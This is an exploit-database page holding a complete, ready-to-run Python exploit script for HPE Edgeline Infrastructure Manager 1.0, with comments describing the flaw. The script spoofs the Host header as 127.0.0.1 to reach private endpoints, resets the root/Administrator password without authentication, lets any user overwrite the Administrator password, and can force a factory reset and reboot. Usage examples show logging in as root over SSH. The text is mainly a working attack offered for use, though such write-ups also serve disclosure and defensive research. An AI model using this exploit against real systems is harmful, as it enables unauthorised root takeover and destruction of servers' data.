扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 |
# Exploit Title: HPE Edgeline Infrastructure Manager 1.0 - Multiple Remote Vulnerabilities # Date: 12-28-2020 # Exploit Author: Jeremy Brown # Vendor Homepage: https://support.hpe.com/hpsc/swd/public/detail?swItemId=MTX_f62aaafe780a496dad6d28621a # Software Link: https://support.hpe.com/hpsc/swd/public/detail?swItemId=MTX_f62aaafe780a496dad6d28621a # Version: 1.0 #!/usr/bin/python # -*- coding: UTF-8 -*- # # billhader.py # # HPE Edgeline Infrastructure Manager Multiple Remote Vulnerabilities # # Jeremy Brown [jbrown3264/gmail] # Dec 2020 # # In \opt\hpe\eim\containers\api\eim\api\urls.py, some private paths are defined # which are intended to only be accessible via the local console. # #path('private/AdminPassReset', views.admin_password_reset), <-- ice #path('private/ResetAppliance', views.reset_appliance), <-- ice #path('private/EIMApplianceIP', views.get_eim_appliance_ips), <-- boring # # These are meant to only be exposed for the local GUI so admins can perform # functions without authenticating. The way do they do this is by checking the # Host header and returning a 404 not found for not-localhost, but 200 OK for # 127.0.0.1. This is of course flawed because any remote user has control over # the Host header and they can call these functions with valid JSON, eg. # /private/AdminPassReset to reset the admin password and login via SSH (default) # as root due to the Administrator and root always synced to the same password. # They can also call ResetAppliance and the appliance will immediately reset # user data and cause the entire server to reboot. # # Administrator is the default and permanent web console user and as mentioned it's # tied to the root OS user account. When Administrator changes their password, the # backend changes the root password to the same. Other users can be added to the # web console, but there is nothing stopping them changing any other user’s password. # Not even sure if this is a bug or just wow functionality because although the # users appear different, they all seem to share the same role. Broken or incomplete # design I guess. So any user can change the Administrator password and use it to # login as root via the default open SSH server, start setting up camp, etc. # # Usage examples # > billhader.py 10.0.0.10 pre_root_passwd -n letmein # {"RootPasswd": "Modified", "UserPassword": "Modified"} # # > ssh root@10.0.0.10 # root@10.10.10.20's password: [letmein] # [root@hpe-eim ~]# # # > billhader.py 10.0.0.10 post_root_passwd -u test -p abc123 # login succeeded # {"Status": "success", "Valid_Entries": ["Password"], "Invalid_Entries": []} # # (root password is now newpassword default of 'letmein') # # > billhader.py 10.10.10.20 pre_factory_reset # Lost your password huh? Are you sure you want to factory reset this server? # yes # done # import os import sys import argparse import requests import urllib.parse import json from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) BINGO = '127.0.0.1' # not localhost :') DEFAULT_PORT = 443 class BillHader(object): def __init__(self, args): self.target = args.target self.action = args.action self.newpassword = args.newpassword self.username = args.username self.password = args.password def run(self): target = "https://" + self.target + ':' + str(DEFAULT_PORT) session = requests.Session() session.verify = False if(self.action == 'pre_root_passwd'): headers = {'Host':BINGO} data = \ {'Password':self.newpassword, 'ConfirmPassword':self.newpassword} try: resp = session.post(target + "/private/AdminPassReset", headers=headers, data=json.dumps(data)) except Exception as error: print("Error: %s" % error) return -1 print("%s" % resp.text) if(self.action == 'post_root_passwd'): data = \ {'UserName':self.username, 'Password':self.password} try: resp = session.post(target + "/redfish/v1/SessionService/Sessions", data=json.dumps(data)) except Exception as error: print("Error: %s" % error) return -1 if(resp.status_code != 201): print("login failed") return -1 else: print("login succeeded") try: token = resp.headers['x-auth-token'] except: print("Error: couldn't parse token from response header") return -1 if(token == None): print("Error: couldn't parse token from session") return -1 headers = {'X-Auth-Token':token} data = {'Password':self.newpassword} try: resp = session.patch(target + "/redfish/v1/AccountService/Accounts/1", headers=headers, data=json.dumps(data)) except Exception as error: print("Error: %s" % error) return -1 print("%s" % resp.text) if(self.action == 'pre_factory_reset'): print("Lost your password huh? Are you sure you want to factory reset this server?") choice = input().lower() if('yes' not in choice): print("cool, exiting") return -1 headers = {'Host':BINGO} data = {'ResetRequired':'true'} try: resp = session.post(target + "/private/ResetAppliance", \ headers=headers, data=json.dumps(data)) except Exception as error: print("Error: %s" % error) return -1 print("done") return 0 def arg_parse(): parser = argparse.ArgumentParser() parser.add_argument("target", type=str, help="EIM host") parser.add_argument("action", type=str, choices=['pre_root_passwd', 'post_root_passwd', 'pre_factory_reset'], help="Which action to perform on the server") parser.add_argument("-n", "--newpassword", type=str, default="letmein", help="New password to set for root account (letmein)") parser.add_argument("-u", "--username", type=str, help="Valid username (for post_root_reset)") parser.add_argument("-p", "--password", type=str, help="Valid password (for post_root_reset)") args = parser.parse_args() return args def main(): args = arg_parse() bill = BillHader(args) result = bill.run() if(result > 0): sys.exit(-1) if(__name__ == '__main__'): main() |
体验盒子
